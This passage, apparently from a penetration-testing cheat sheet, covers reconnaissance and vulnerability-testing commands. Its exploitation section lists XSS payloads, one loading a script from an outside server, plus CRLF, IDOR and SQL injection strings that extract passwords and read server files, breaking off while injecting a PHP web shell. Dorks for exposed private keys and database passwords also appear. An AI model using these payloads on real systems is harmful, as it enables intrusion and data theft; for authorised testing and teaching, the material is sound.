tee gau_403_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^4\")).url' httpx_gau_results.json | sort -uf | tee gau_4xx_results.txt\n```\n\n### urlhunter\n\nInstallation:\n\n```bash\ngo install -v github.com/utkusen/urlhunter@latest\n```\n\nGather URLs from URL shortening services:\n\n```fundamental\nurlhunter -o urlhunter_results.txt -date latest -keywords keywords.txt\n```\n\n### Google Dorks\n\nGoogle Dork databases:\n\n* [exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database)\n* [cxsecurity.com/dorks](https://cxsecurity.com/dorks)\n* [pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking)\n* [opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt](https://github.com/opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt)\n\nCheck the list of `/.well-known/` files [here](https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml).\n\nGoogle Dorking will not show directories nor files that are disallowed in `robots.txt`, to check for such directories and files use [httpx](#httpx).\n\nAppend `site:www.somedomain.com` to limit your scope to a specified domain/subdomain. Append `site:*.somedomain.com` to limit your scope to all subdomains. Append `site:*.somedomain.com -www` to exclude `www` subdomain from results.\n\nSimple Google Dorks:\n\n```fundamental\ninurl:/robots.txt intext:disallow ext:txt\n\ninurl:/.well-known/security.txt ext:txt\n\ninurl:/info.php intext:\"php version\" ext:php\n\nintitle:\"index of /\" intext:\"parent directory\"\n\nintitle:\"index of /.git\" intext:\"parent directory\"\n\ninurl:/gitweb.cgi\n\nintitle:\"Dashboard [Jenkins]\"\n\n(intext:\"mysql database\" AND intext:db_password) ext:txt\n\nintext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt)\n```\n\n### Chad\n\nFind and download files using a Google Dork:\n\n```fundamental\nmkdir chad_downloads\n\nchad -nsos -o chad_downloads_results.json -dir chad_downloads -tr 100 -q \"ext:txt OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx\" -s *.somedomain.com\n```\n\nExtract authors (and more) from the files:\n\n```bash\napt-get -y install libimage-exiftool-perl\n\nexiftool -S chad_results | grep -Po '(?\u003c=Author\\:\\ ).+' | sort -uf | tee -a people.txt\n```\n\nFind directory listings using a Google Dork:\n\n```fundamental\nchad -nsos chad_directory_listings_results.json -tr 100 -q 'intitle:\"index of /\" intext:\"parent directory\"' -s *.somedomain.com\n```\n\nMore about my project at [ivan-sincek/chad](https://github.com/ivan-sincek/chad).\n\n### PhoneInfoga\n\nDownload the latest version from [GitHub](https://github.com/sundowndev/phoneinfoga/releases) and check how to [install](#0-install-tools-and-setup) the tool.\n\nGet a phone number information:\n\n```fundamental\nphoneinfoga scan -n +1111111111\n```\n\nGet a phone number information interacting with the UI:\n\n```fundamental\nphoneinfoga serve\n```\n\nNavigate to `http://localhost:5000` with your preferred web browser.\n\n### git-dumper\n\nTry to reconstruct a GitHub repository, i.e., get the source code, based on the commit history from a public `/.git` directory:\n\n```fundamental\ngit-dumper https://somesite.com/.git git_dumper_results\n```\n\nThis tool might not be able to reconstruct the whole repository every time, but it could still reveal some sensitive information.\n\nSome additional `git` commands to try on the cloned `/.git` directory:\n\n```fundamental\ngit status\n\ngit log\n\ngit checkout -- .\n\ngit restore .\n```\n\nUse [Google Dorking](#google-dorks) and [Chad](#chad) to find more targets.\n\n# TruffleHog\n\nInstallation:\n\n```bash\ngit clone https://github.com/trufflesecurity/trufflehog \u0026\u0026 cd trufflehog\n\ngo install\n```\n\nSearch for sensitive keys inside a single repository or the whole organization on GitHub:\n\n```fundamental\ntrufflehog git https://github.com/trufflesecurity/test_keys --only-verified --json\n\ntrufflehog github --org=trufflesecurity --only-verified --json\n```\n\nSearch for sensitive keys inside files and directories:\n\n```fundamental\ntrufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2\n```\n\nMore about the project at [trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog).\n\n## File Scraper\n\nTO DO: Finish.\n\nMore about the project at [ivan-sincek/file-scraper](https://github.com/ivan-sincek/file-scraper).\n\n### katana\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/katana/cmd/katana@latest\n```\n\nCrawl a website:\n\n```fundamental\nkatana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u https://somesite.com/home\n\nkatana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u subdomains_live_long_2xx.txt\n```\n\n### Scrapy Scraper\n\nCrawl a website, download, and beautify \\[minified\\] JavaScript files:\n\n```fundamental\nscrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u https://somesite.com/home\n\nscrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u subdomains_live_long_2xx.txt\n```\n\nIn case you get no results while using Playwright's headless browser, try updating it:\n\n```fundamental\npip3 install --upgrade playwright\n\nplaywright install chromium\n```\n\nMore about my project at [ivan-sincek/scrapy-scraper](https://github.com/ivan-sincek/scrapy-scraper).\n\nScrape the JavaScript files using [TruffleHog](#trufflehog) and [File Scraper](#file-scraper).\n\n### Directory Fuzzing\n\n**Don't forget that GNU/Linux OS has a case sensitive file system, so make sure to use the right wordlists.**\n\nIf you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions.\n\nThe below tools support recursive directory and file search. Also, they might take a long time to finish depending on the used settings and wordlist.\n\n### DirBuster\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/img/dirbuster.png\" alt=\"DirBuster\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - DirBuster\u003c/p\u003e\n\nAll DirBuster's wordlists are located at `/usr/share/dirbuster/wordlists/` directory.\n\n### feroxbuster\n\nBrute force directories on a web server:\n\n```fundamental\ncat subdomains_live_long.txt | feroxbuster --stdin -k -n --auto-bail --random-agent -t 50 -T 3 --json -o feroxbuster_results.txt -s 200,301,302,401,403 -w directory-list-lowercase-2.3-medium.txt\n```\n\nThis tool is faster than [DirBuster](#dirbuster).\n\nFilter out directories from the results:\n\n```bash\njq -r 'select(.status | tostring | test(\"^2\")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx.txt\n\njq -r 'select(.status | tostring | test(\"^2|^4\")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx_4xx.txt\n\njq -r 'select(.status | tostring | test(\"^3\")).url' feroxbuster_results.json | sort -uf | tee -a directories_3xx.txt\n\njq -r 'select(.status | tostring | test(\"^401$\")).url' feroxbuster_results.json | sort -uf | tee -a directories_401.txt\n\njq -r 'select(.status | tostring | test(\"^403$\")).url' feroxbuster_results.json | sort -uf | tee -a directories_403.txt\n\njq -r 'select(.status | tostring | test(\"^4\")).url' feroxbuster_results.json | sort -uf | tee -a directories_4xx.txt\n\njq -r 'select(.status | tostring | test(\"^5\")).url' feroxbuster_results.json | sort -uf | tee -a directories_5xx.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -u | The target URL (required, unless \\[--stdin \\| --resume-from\\] is used) |\n| --stdin | Read URL(s) from STDIN |\n| -a/-A | Sets the User-Agent (default: feroxbuster\\/x.x.x) \\/ Use a random User-Agent |\n| -x | File extension(s) to search for (ex: -x php -x pdf,js) |\n| -m | Which HTTP request method(s) should be sent (default: GET) |\n| --data | Request's body; can read data from a file if input starts with an \\@(ex: \\@post.bin) |\n| -H | Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things') |\n| -b | Specify HTTP cookies to be used in each request (ex: -b stuff=things) |\n| -Q | Request's URL query parameters (ex: -Q token=stuff -Q secret=key) |\n| -f | Append \\/ to each request's URL |\n| -s | Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405) |\n| -T | Number of seconds before a client's request times out (default: 7) |\n| -k | Disables TLS certificate validation for the client |\n| -t | Number of concurrent threads (default: 50) |\n| -n | Do not scan recursively |\n| -w | Path to the wordlist |\n| --auto-bail | Automatically stop scanning when an excessive amount of errors are encountered |\n| -B | Automatically request likely backup extensions for \"found\" URLs (default: ~, .bak, .bak2, .old, .1) |\n| -q | Hide progress bars and banner (good for tmux windows w/ notifications) |\n| -o | Output file to write results to (use w/ --json for JSON entries) |\n\n### snallygaster\n\nDownload the latest version from [GitHub](https://github.com/hannob/snallygaster/releases). See how to [install](#0-install-tools-and-setup) the tool.\n\nSearch a web server for sensitive files:\n\n```bash\nsnallygaster --nowww somesite.com | tee snallygaster_results.txt\n\nfor subdomain in $(cat subdomains_live_short_http.txt); do snallygaster --nohttps --nowww \"${subdomain}\"; done | tee snallygaster_http_results.txt\n\nfor subdomain in $(cat subdomains_live_short_https.txt); do snallygaster --nohttp --nowww \"${subdomain}\"; done | tee snallygaster_https_results.txt\n```\n\n### IIS Tilde Short name Scanning\n\nDownload:\n\n```bash\ngit clone https://github.com/irsdl/IIS-ShortName-Scanner \u0026\u0026 cd IIS-ShortName-Scanner/release\n```\n\nSearch an IIS server for files and directories:\n\n```fundamental\njava -jar iis_shortname_scanner.jar 2 30 https://somesite.com\n```\n\n### WhatWeb\n\nIdentify a website:\n\n```fundamental\nwhatweb -v somesite.com\n```\n\n### Parsero\n\nTest all `robots.txt` entries:\n\n```fundamental\nparsero -sb -u somesite.com\n```\n\n### EyeWitness\n\nGrab screenshots from websites:\n\n```fundamental\neyewitness --no-prompt --no-dns --timeout 3 --threads 5 -d eyewitness_results -f subdomains_live_long.txt\n```\n\nTo check the screenshots, navigate to `eyewitness_results/screens` directory.\n\n### Wordlists\n\nYou can find `rockyou.txt` inside `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists) - a useful collection of multiple types of wordlists for security assessments.\n\nInstall SecLists (the collection will be stored at `/usr/share/seclists/` directory):\n\n```bash\napt-get update \u0026\u0026 apt-get install seclists\n```\n\nMy contribution to the SecLists: [danielmiessler/SecLists/tree/master/Fuzzing/Amounts](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Amounts)\n\nAnother popular wordlist collections:\n\n* [ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)\n* [xmendez/wfuzz](https://github.com/xmendez/wfuzz)\n* [assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists)\n* [weakpass.com/wordlist](https://weakpass.com/wordlist)\n* [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists)\n\n## 2. Scanning/Enumeration\n\nKeep in mind that web applications or services can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g., they can be hosted on port 8443 (HTTPS).\n\nKeep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or services. Use [Ncat](#ncat) or Telnet for banner grabbing.\n\nKeep in mind that on different URL paths a web server can host different web applications or services, e.g., `somesite.com/app_one/` and `somesite.com/app_two/`.\n\nWhile scanning for vulnerabilities or running other intensive scans, periodically check the web application or service if it crashed, so that you can alert your client as soon as possible; or in case you got rate limited by the web application firewall (WAF) or some other security product, so that you can pause your scans because all your subsequent requests will be blocked and your results will not be complete.\n\nIf a web application or service all of sudden stops responding, try to access the web application or service using your mobile data, i.e., using a different IP. It is possible that your current IP was temporarily blocked.\n\nSend an email message to a non-existent address at target's domain, it will often reveal useful internal network information through a nondelivery notification (NDN).\n\nGet a free [Nessus Community](https://community.tenable.com/s/article/Nessus-Essentials), and if you can afford it, get [Burp Suite Professional](https://portswigger.net/burp) or [Caido](https://caido.io).\n\n### 2.1 Useful Websites\n\n* [ipaddressguide.com/cidr](https://www.ipaddressguide.com/cidr)\n* [account.arin.net/public/cidrCalculator](https://account.arin.net/public/cidrCalculator)\n* [calculator.net/ip-subnet-calculator.html](https://www.calculator.net/ip-subnet-calculator.html)\n* [speedguide.net/ports.php](https://www.speedguide.net/ports.php)\n* [securityheaders.com](https://securityheaders.com)\n* [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) - Content Security Policy evaluator\n\n### Nmap\n\n**For better results, use IPs instead of domain names.**\n\nPing sweep, map live hosts:\n\n```fundamental\nnmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24\n\nnmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt\n```\n\n**Some web servers will not respond to ping (ICMP) requests, so the mapping of the live hosts will not be accurate.**\n\nExtract live hosts from the results:\n\n```bash\ngrep -Po '(?\u003c=Host\\:\\ )[^\\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt\n```\n\nTCP scan, all ports:\n\n```fundamental\nnmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24\n\nnmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt\n```\n\nAutomate TCP scan:\n\n```bash\nmkdir nmap_tcp_results\n\nfor ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN \"nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt\" -p- \"${ip}\"; done\n```\n\nUDP scan, only important ports:\n\n```fundamental\nnmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24\n\nnmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt\n```\n\nAutomate UDP scan:\n\n```bash\nmkdir nmap_udp_results\n\nfor ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN \"nmap_udp_results/nmap_udp_results_${ip//./_}.txt\" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 \"${subdomain}\"; done\n```\n\n| Option | Description |\n| --- | --- |\n| -sn | Ping scan - disable port scan |\n| -Pn | Treat all hosts as online -- skip host discovery |\n| -n/-R | Never do DNS resolution/Always resolve (default: sometimes) |\n| -sS/sT/sA | TCP SYN/Connect()/ACK |\n| -sU | UDP scan |\n| -p/-p- | Only scan specified ports/Scan all ports |\n| --top-ports | Scan \u003cnumber\u003e most common ports |\n| -sV | Probe open ports to determine service/version info |\n| -O | Enable OS detection |\n| -sC | Same as --script=default |\n| --script | Script scan (takes time to finish) |\n| --script-args | Provide arguments to scripts |\n| --script-help | Show help about scripts |\n| -oN/-oX/-oG | Output scan in normal, XML, and Grepable format |\n| -v | Increase verbosity level (use -vv or more for greater effect) |\n| --reason | Display the reason a port is in a particular state |\n| -A | Enable OS detection, version detection, script scanning, and traceroute |\n\nAll Nmap's scripts are located at `/usr/share/nmap/scripts/` directory. Read more about the scripts [here](https://nmap.org/nsedoc).\n\nNSE examples:\n\n```fundamental\nnmap -nv --script='mysql-brute' --script-args='userdb=\"users.txt\", passdb=\"rockyou.txt\"' 192.168.8.5 -p 3306\n\nnmap -nv --script='dns-brute' --script-args='dns-brute.domain=\"somedomain.com\", dns-brute.hostlist=\"subdomains-top1mil.txt\"'\n\nnmap -nv --script='ssl-heartbleed' -iL cidrs.txt\n```\n\nYou can find `rockyou.txt` and `subdomains-top1mil.txt` wordlists in [SecLists](#wordlists).\n\nI prefer to use [Nuclei](#nuclei) for vulnerability scanning.\n\n### testssl.sh\n\nInstallation:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install testssl.sh\n```\n\nTest an SSL/TLS certificate (e.g., SSL/TLS ciphers, protocols, etc.):\n\n```fundamental\ntestssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com\n```\n\nYou can also use testssl.sh to exploit SSL/TLS vulnerabilities.\n\n### OpenSSL\n\nTest a web server for Heartbleed vulnerability:\n\n```bash\nfor subdomain in $(cat subdomains_live.txt); do res=$(echo \"Q\" | openssl s_client -connect \"${subdomain}:443\" 2\u003e\u00261 | grep 'server extension \"heartbeat\" (id=15)'); if [[ ! -z $res ]]; then echo \"${subdomain}\"; fi; done | tee openssl_heartbleed_results.txt\n\n# omit the URL scheme\nfor subdomain in $(cat subdomains_live_short_https.txt); do res=$(echo \"Q\" | openssl s_client -connect \"${subdomain}\" 2\u003e\u00261 | grep 'server extension \"heartbeat\" (id=15)'); if [[ ! -z $res ]]; then echo \"${subdomain}\"; fi; done | tee openssl_heartbleed_results.txt\n```\n\n### keytool\n\nGrab SSL/TLS certificate:\n\n```fundamental\nkeytool -printcert -rfc -sslserver somesite.com \u003e keytool_results.txt\n\nopenssl x509 -noout -text -in keytool_results.txt\n```\n\nUse [uncover](#uncover) with Shodan and Censys SSL/TLS Dorks to find more in-scope hosts.\n\n## 3. Vulnerability Assesment/Exploiting\n\nAlways try the null session login, i.e., no password login, or search the Internet for default credentials for a specific web application.\n\nTry to manipulate cookies or JWT tokens to gain access or elevate privileges. On logout, always check if any of the cookies or JWT tokens are still valid.\n\nAlways inspect web browser's local storage, especially if testing a single-page application (SPA).\n\nTry to transform, e.g., an HTTP POST request into an HTTP GET request, i.e., into a query string, and see how a server will react to it.\n\nTurn off JavaScript in your web browser and check the web application behaviour again.\n\nCheck the web application behaviour on a mobile device as some features might work differently. Try spoofing your User-Agent or try to visiting `m.somesite.com`.\n\nIf you want to automate your code injection testing, check the [Wordlists](#wordlists) sub-section for code injection wordlists. Some of the wordlists also include obfuscated code injections.\n\nIf you see any amounts or quantities, try to use [danielmiessler/SecLists/tree/master/Fuzzing/Amounts](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Amounts) wordlist as it might cause unintended behavior, errors, or even bypass the minimum and maximum boundaries.\n\n**Don't forget to clean up after yourself. Remove all the created artifacts, incl. malware, exploits, tools, scripts, etc., and revert all the settings and changes from a target host after you are done testing.**\n\n### 3.1 Useful Websites\n\n* [cvedetails.com](https://www.cvedetails.com)\n* [exploit-db.com](https://www.exploit-db.com)\n* [cxsecurity.com](https://cxsecurity.com/wlb)\n* [hakluke/weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads)\n* [namecheap.com](https://www.namecheap.com) - buy domains for cheap\n* [streaak/keyhacks](https://github.com/streaak/keyhacks) - validate API keys\n* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n* [jwt.io](https://jwt.io)\n* [portswigger.net/web-security](https://portswigger.net/web-security)\n* [bigiamchallenge.com](https://bigiamchallenge.com) - nice AWS CTF\n\n### Collaborator Servers\n\nUsed when trying to exploit an open redirect, blind cross-site scripting (XSS), DNS and HTTP interactions, etc.\n\n* [interactsh.com](https://app.interactsh.com)\n* [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)\n* [canarytokens.org](https://canarytokens.org/generate)\n* [webhook.site](https://webhook.site)\n\t\n### Subdomain Takeover\n\nGather as much information as you can for a specified target, see how in [1. Reconnaissance](#1-reconnaissance).\n\nGather organization names with [WHOIS](#whois-asn-cidr), and canonical names with [host](#host).\n\nYou can double check if domains/subdomains are dead with [dig](#dig) or alive and [httpx](#httpx).\n\nCheck if hosting providers for the found domains/subdomains are vulnerable to domain/subdomain takeover at [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz). Credits to the author!\n\nBiggest cloud service providers:\n\n* [aws.amazon.com](https://aws.amazon.com)\n* [azure.microsoft.com](https://azure.microsoft.com)\n* [cloud.google.com](https://cloud.google.com)\n* [wordpress.com](https://wordpress.com)\n* [shopify.com](https://www.shopify.com)\n\n### Subzy\n\nInstallation:\n\n```fundamental\ngo install -v github.com/lukasikic/subzy@latest\n```\n\nCheck for domains/subdomains takeover:\n\n```fundamental\nsubzy -concurrency 100 -timeout 3 -targets subdomains_errors.txt | tee subzy_results.txt\n```\n\n### subjack\n\nInstallation:\n\n```bash\ngo install -v github.com/haccer/subjack@latest\n```\n\nCheck for domains/subdomains takeover:\n\n```fundamental\nsubjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains_errors.txt\n```\n\n### Bypassing the 401 and 403\n\nFind out how to bypass 4xx HTTP response status codes at [ivan-sincek/forbidden](https://github.com/ivan-sincek/forbidden).\n\n### Nikto\n\nScan a web server:\n\n```fundamental\nnikto -output nikto_results.txt -h somesite.com -p 80\n```\n\n### WPScan\n\nScan a WordPress website:\n\n```fundamental\nwpscan -o wpscan_results.txt --url somesite.com\n```\n\n### Nuclei\n\nInstallation and updating:\n\n```bash\ngo install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\n\nnuclei -up \u0026\u0026 nuclei -ut\n```\n\nVulnerability scan, all templates:\n\n```bash\nnuclei -c 500 -o nuclei_results.txt -l subdomains_live_long_2xx_4xx.txt\n\ncat nuclei_results.txt | grep -Po '(?\u003c=\\]\\ ).+' | sort -uf \u003e nuclei_sorted_results.txt\n```\n\nOnly subdomain takeover:\n\n```fundamental\nnuclei -c 500 -t takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt\n```\n\n### Arjun\n\nDiscover request parameters:\n\n```fundamental\narjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -u https://somesite.com\n\narjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -i subdomains_live_long_2xx.txt\n```\n\n### WFUZZ\n\nFuzz directories:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u https://somesite.com/WFUZZ -w directory-list-lowercase-2.3-medium.txt\n```\n\nFuzz parameter values:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?someparam=WFUZZ\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -u \"https://somesite.com/someapi\" -d \"someparam=WFUZZ\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/json\" -u \"https://somesite.com/someapi\" -d \"{\\\"someparam\\\": \\\"WFUZZ\\\"}\" -w somewordlist.txt\n```\n\nFuzz parameters:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?WFUZZ=somevalue\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -u \"https://somesite.com/someapi\" -d \"WFUZZ=somevalue\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/json\" -u \"https://somesite.com/someapi\" -d \"{\\\"WFUZZ\\\": \\\"somevalue\\\"}\" -w somewordlist.txt\n```\n\nAdditional example, internal SSRF fuzzing:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?url=127.0.0.1:WFUZZ\" -w ports.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?url=WFUZZ:80\" -w ips.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -f | Store results in the output file |\n| -t | Specify the number of concurrent connections (10 default) |\n| -s | Specify time delay between requests (0 default) |\n| -u | Specify a URL for the request |\n| -w | Specify a wordlist file |\n| -X | Specify an HTTP method for the request, i.e., HEAD or FUZZ |\n| -b | Specify a cookie for the requests |\n| -d | Use post data |\n| -H | Use header |\n| --hc/--hl/--hw/--hh | Hide responses with the specified code/lines/words/chars |\n| --sc/--sl/--sw/--sh| Show responses with the specified code/lines/words/chars |\n| --ss/--hs| Show/hide responses with the specified regex within the content |\n\n### Insecure Direct Object Reference (IDOR)\n\nFirst, try to simply change one value to another, e.g., change `victim@gmail.com` to `hacker@gmail.com`, change some ID from `1` to `2`, etc.\n\nIt is likely that lower number IDs will relate to some higher privilege accounts or roles.\n\nSecond, try parameter pollution:\n\n```fundamental\n\"email\":\"hacker@gmail.com,victim@gmail.com\"\n\"email\":\"hacker@gmail.com victim@gmail.com\"\n\"email\":\"hacker@gmail.com\",\"email\":\"victim@gmail.com\"\n\"email\":\"victim@gmail.com,hacker@gmail.com\"\n\"email\":\"victim@gmail.com hacker@gmail.com\"\n\"email\":\"victim@gmail.com\",\"email\":\"hacker@gmail.com\"\n\"email\":(\"hacker@gmail.com\",\"victim@gmail.com\")\n\"email\":[\"hacker@gmail.com\",\"victim@gmail.com\"]\n\"email\":{\"hacker@gmail.com\",\"victim@gmail.com\"}\n\"email\":(\"victim@gmail.com\",\"hacker@gmail.com\")\n\"email\":[\"victim@gmail.com\",\"hacker@gmail.com\"]\n\"email\":{\"victim@gmail.com\",\"hacker@gmail.com\"}\nemail=hacker%40gmail.com,victim%40gmail.com\nemail=hacker%40gmail.com%20victim%40gmail.com\nemail=hacker%40gmail.com\u0026email=victim%40gmail.com\nemail[]=hacker%40gmail.com\u0026email[]=victim%40gmail.com\nemail=victim%40gmail.com,hacker%40gmail.com\nemail=victim%40gmail.com%20hacker%40gmail.com\nemail=victim%40gmail.com\u0026email=hacker%40gmail.com\nemail[]=victim%40gmail.com\u0026email[]=hacker%40gmail.com\n```\n\nTo generate the above output, run [idor.py](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/scripts/idor.py):\n\n```fundamental\npython3 idor.py -n email -i victim@gmail.com -t hacker@gmail.com\n```\n\n### HTTP Response Splitting\n\nAlso known as CRLF injection. CRLF refers to carriage return (`ASCII 13`, `\\r`) and line feed (`ASCII 10`, `\\n`).\n\nWhen encoded, `\\r` refers to `%0D` and `\\n` refers to `%0A`.\n\nFixate a session cookie:\n\n```fundamental\nsomesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789\n```\n\nOpen redirect:\n\n```fundamental\nsomesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com\n```\n\nSession fixation and open redirection are one of many techniques used in combination with HTTP response splitting. Search the Internet for more techniques.\n\n### Cross-Site Scripting (XSS)\n\nSimple cross-site scripting (XSS) payloads:\n\n```html\n\u003cscript\u003ealert(1)\u003c/script\u003e\n\n\u003cscript src=\"https://myserver.com/xss.js\"\u003e\u003c/script\u003e\n\n\u003cimg src=\"https://github.com/favicon.ico\" onload=\"alert(1)\"\u003e\n```\n\nHosting JavaScript on [Pastebin](https://pastebin.com) won't work because Pastebin always returns `text/plain` content-type.\n\nFind out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks at [ivan-sincek/xss-catcher](https://github.com/ivan-sincek/xss-catcher).\n\nValid emails with embedded XSS:\n\n```html\nuser+(\u003cscript\u003ealert(1)\u003c/script\u003e)@somedomain.com\n\nuser@somedomain(\u003cscript\u003ealert(1)\u003c/script\u003e).com\n\n\"\u003cscript\u003ealert(1)\u003c/script\u003e\"@somedomain.com\n```\n\n### SQL Injection\n\n**The following payloads were tested on MySQL database. Note that MySQL requires a whitespace character between the comment symbol and the next character.**\n\nIf you need to URL encode the whitespace character, use `%20` or `+` instead.\n\nTry to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.\n\n**Always make sure to properly close the surrounding code.**\n\nRead this OWASP [article](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF) to learn how to bypass WAF.\n\n---\n\nBoolean-based SQLi:\n\n```fundamental\n' OR 1=1-- \n\n' OR 1=2-- \n```\n\n---\n\nUnion-based SQLi:\n\n```fundamental\n' UNION SELECT 1,2,3,4-- \n\n' UNION SELECT NULL,NULL,NULL,NULL-- \n\n' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- \n\n' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- \n\n' UNION SELECT 1,load_file('..\\\\..\\\\apache\\\\conf\\\\httpd.conf'),3,4-- \n```\n\nIf using, e.g., `1,2,3,4` does not work, try using `NULL,NULL,NULL,NULL` respectively.\n\nUse the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.\n\nThe goal is to determine the exact number of columns in the SQL query and to figure out which of them are shown back to the user.\n\nAnother way to determine the exact number of columns is by using, e.g., `' ORDER BY 1-- `, where `1` is the column number used for sorting - incrementing it by one on each try.\n\n---\n\nTime-based SQLi:\n\n```fundamental\n' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- \n\n' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@127.0.0.1' THEN sleep(2) ELSE sleep(0) END) test)-- \n\n' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- \n\n' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- \n\n' AND IF(version() LIKE '5%',sleep(2),sleep(0))-- \n```\n\nUse the time-based SQLi when you are not able to see the results.\n\n---\n\nCheck for the existance/correctness:\n\n```fundamental\n' AND (SELECT 'exists' FROM users) = 'exists\n\n' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists\n\n' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) \u003c 8 ) = 'correct\n\n' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct\n\n'||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||'\n```\n\n---\n\nInject a [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get.php) based on HTTP GET request:\n\n```fundamental\n' UNION SELECT '', '', '', '\u003c?php if(isset($_GET[\"command\"])){echo 